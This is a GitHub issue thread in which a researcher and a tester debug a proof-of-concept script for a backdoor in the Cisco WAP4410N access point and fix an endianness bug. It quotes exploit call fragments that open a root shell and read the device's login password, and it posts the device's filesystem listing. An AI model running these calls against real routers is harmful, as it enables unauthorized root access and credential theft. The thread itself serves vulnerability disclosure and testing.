Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

WAP4410N #11

Closed
Matthew1471 opened this issue Jan 2, 2014 · 25 comments
Closed

WAP4410N #11

Matthew1471 opened this issue Jan 2, 2014 · 25 comments

Comments

@Matthew1471
Copy link

Listens to port and responds to data with "ScMM" but your Python script doesn't work in its current form.

PID VID: WAP4410N-E V02
Software Version: 2.0.6.1
@elvanderb
Copy link
Owner

strange... I'll investigate :)
Is there any error/message?

@Matthew1471
Copy link
Author

I have a PCAP if you want me to e-mail it?

Edit: Actually uploaded it here : http://filebin.ca/17UJu55XztDv/Capture.pcapng

@elvanderb
Copy link
Owner

no, thank you, I'll search the firmware.

@Matthew1471
Copy link
Author

Okay thanks :-). Let me know if I can help.

@elvanderb
Copy link
Owner

The binary in your firmware have all the symbols :) nice
I had a quick look on your version of scfgmgr and it seems to works like the WAG200G one (even if the code is a little bit different).
I'll soon update my code to add the shell could you please test it on your router when it'll be up?

@Matthew1471
Copy link
Author

Certainly will, thanks! Let me know when it's up.

@elvanderb
Copy link
Owner

updated, could you test it and past the result?

@elvanderb
Copy link
Owner

you can also try some commands like 'ps'

@Matthew1471
Copy link
Author

backdoorolol.py

Traceback (most recent call last):
File "backdoorolol.py", line 41, in
print send_message(s, 7, 'echo "welcome, here is a root shell, have fun"')[1
]
File "backdoorolol.py", line 19, in send_message
assert(sig == 0x53634D4D)
AssertionError

@Matthew1471
Copy link
Author

I added:
print hex(sig)

and got:
0x4d4d6353

Which is backwards... So, endian?

@elvanderb
Copy link
Owner

Yep :)
You're right :)
Your router is big endian, mine is little endian.
This backdoor is really bad coded :D
I'll add some code to detect that, thank you very much for taking the time to report this :)

@elvanderb
Copy link
Owner

Could you test the last version please?

@Matthew1471
Copy link
Author

Needed to bug fix to this line:
elif sig == 0X4D4D6353 :

However it now works! CONFIRMED!

Thank you very much for your time and patience :)

@elvanderb
Copy link
Owner

Oh yes, my bad :)
you are welcome, thank you for your testing and report :)

@Matthew1471
Copy link
Author

No, thank you :-)

Can you see from the firmware if there's a similar getvar function like with yours?

@elvanderb
Copy link
Owner

you can use the command 1 to dump all the available variables, commands numbers are the same :)
command to use to dump all the vars:
send_message(s, endianness, 1) # dump all the variables

If I wasn't lazy I would code a real PoC with command line parameters :D

@Matthew1471
Copy link
Author

Ah I kept trying with 2 and forgot about 1.

For 2 on this model it needs to be:
print send_message(s, endianness, 2, "login_password")[1]

The backdoor seems a bit unstable, if you try executing something it doesn't like it disconnects you and I don't seem to be able to close my connections properly (I managed to get it to refuse to let me to connect until I rebooted the AP).

Here's the contents of /bin/

ls /bin/ -l
lrwxrwxrwx 1 0 0 7 watch -> busybox
lrwxrwxrwx 1 0 0 7 vi -> busybox
lrwxrwxrwx 1 0 0 7 umount -> busybox
lrwxrwxrwx 1 0 0 7 touch -> busybox
lrwxrwxrwx 1 0 0 7 sleep -> busybox
lrwxrwxrwx 1 0 0 7 sh -> busybox
lrwxrwxrwx 1 0 0 7 sed -> busybox
lrwxrwxrwx 1 0 0 7 rm -> busybox
lrwxrwxrwx 1 0 0 7 pwd -> busybox
lrwxrwxrwx 1 0 0 7 ps -> busybox
lrwxrwxrwx 1 0 0 7 ping6 -> busybox
lrwxrwxrwx 1 0 0 7 ping2file -> busybox
lrwxrwxrwx 1 0 0 7 ping -> busybox
lrwxrwxrwx 1 0 0 7 mv -> busybox
lrwxrwxrwx 1 0 0 7 mount -> busybox
lrwxrwxrwx 1 0 0 7 mkdir -> busybox
lrwxrwxrwx 1 0 0 7 ls -> busybox
lrwxrwxrwx 1 0 0 7 login -> busybox
lrwxrwxrwx 1 0 0 7 ln -> busybox
lrwxrwxrwx 1 0 0 7 kill -> busybox
lrwxrwxrwx 1 0 0 7 hostname -> busybox
lrwxrwxrwx 1 0 0 7 grep -> busybox
lrwxrwxrwx 1 0 0 7 fgrep -> busybox
lrwxrwxrwx 1 0 0 7 egrep -> busybox
lrwxrwxrwx 1 0 0 7 echo -> busybox
lrwxrwxrwx 1 0 0 7 dmesg -> busybox
lrwxrwxrwx 1 0 0 7 df -> busybox
lrwxrwxrwx 1 0 0 7 date -> busybox
lrwxrwxrwx 1 0 0 7 cp -> busybox
lrwxrwxrwx 1 0 0 7 chmod -> busybox
lrwxrwxrwx 1 0 0 7 cat -> busybox
-rwxr-xr-x 1 0 0 526260 busybox
lrwxrwxrwx 1 0 0 7 ash -> busybox

and the supported features of busybox:

busybox
BusyBox v1.1.0 (2011.10.27-14:28+0000) multi-call binary

Usage: busybox [function] [arguments]...
or: [function] [arguments]...

    BusyBox is a multi-call binary that combines many common Unix
    utilities into a single executable.  Most people will create a
    link to busybox for each function they wish to use and BusyBox
    will act like whatever it was invoked as!

Currently defined functions:
[, [[, ash, brctl, busybox, cat, chmod, cp, cut, date, df, dmesg,
echo, egrep, fgrep, free, ftpget, ftpput, grep, hostname, ifconfig,
init, insmod, kill, killall, ln, login, ls, lsmod, mkdir, mount,
mv, passwd, ping, ping2file, ping6, ps, pwd, reboot, rm, rmmod,
route, sed, sh, sleep, tail, telnetd, test, tftp, top, touch,
umount, vi, watch, which, xargs

@elvanderb
Copy link
Owner

Nice, thank you :)
I'm updating the PoC to make it a little bit more user friendly ;)

@Matthew1471
Copy link
Author

Just tried the new version, works well. Thanks for researching this and helping to make the product safer!

Just wondering but given our endian discovery, your list of "Backdoor is not working in", do these need to be re-checked with the new code?

@elvanderb
Copy link
Owner

I don't think so, people reported routers with closed ports.
Thank you for your testing :) I just updated a new version that fix some bug

@Matthew1471
Copy link
Author

Thanks.

Minor thing, WAP4410N is a Cisco product not Linksys : http://www.cisco.com/en/US/prod/collateral/wireless/ps5678/ps10047/ps10052/data_sheet_c78-501860.html

@elvanderb
Copy link
Owner

woops, fixed :)

@dualglass dualglass mentioned this issue Jan 4, 2014
Closed
@avsavchenko
Copy link

Not works with new firmware 2.0.7.4

@an3k
Copy link

an3k commented Jan 24, 2014

WAP4410N (also known as WAP4410N-E, it's the same device) Hardware Revision 01 and 02 are Linksys (in fact "Linksys by Cisco") products, Rev 03 is pure Cisco.

Linksys was never a company on it's own. It was just a "brand" name Cisco used for their SOHO products.

@gpread
Copy link

gpread commented Sep 17, 2022

Listens to port and responds to data with "ScMM" but your Python script doesn't work in its current form.

PID VID: WAP4410N-E V02 Software Version: 2.0.6.1

Hi, @Matthew1471

I am looking for a 2.0.6.1 or newer firmware image file for a WAP4410N-E V02 that I have. Cisco made this device unsupported in 2019 and so I am unable to find one through an official channel. Any chance that you have it, and can upload somewhere that I could download from, so I can update my device ? Thanks in advance, Gavin

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@elvanderb @an3k @Matthew1471 @avsavchenko @gpread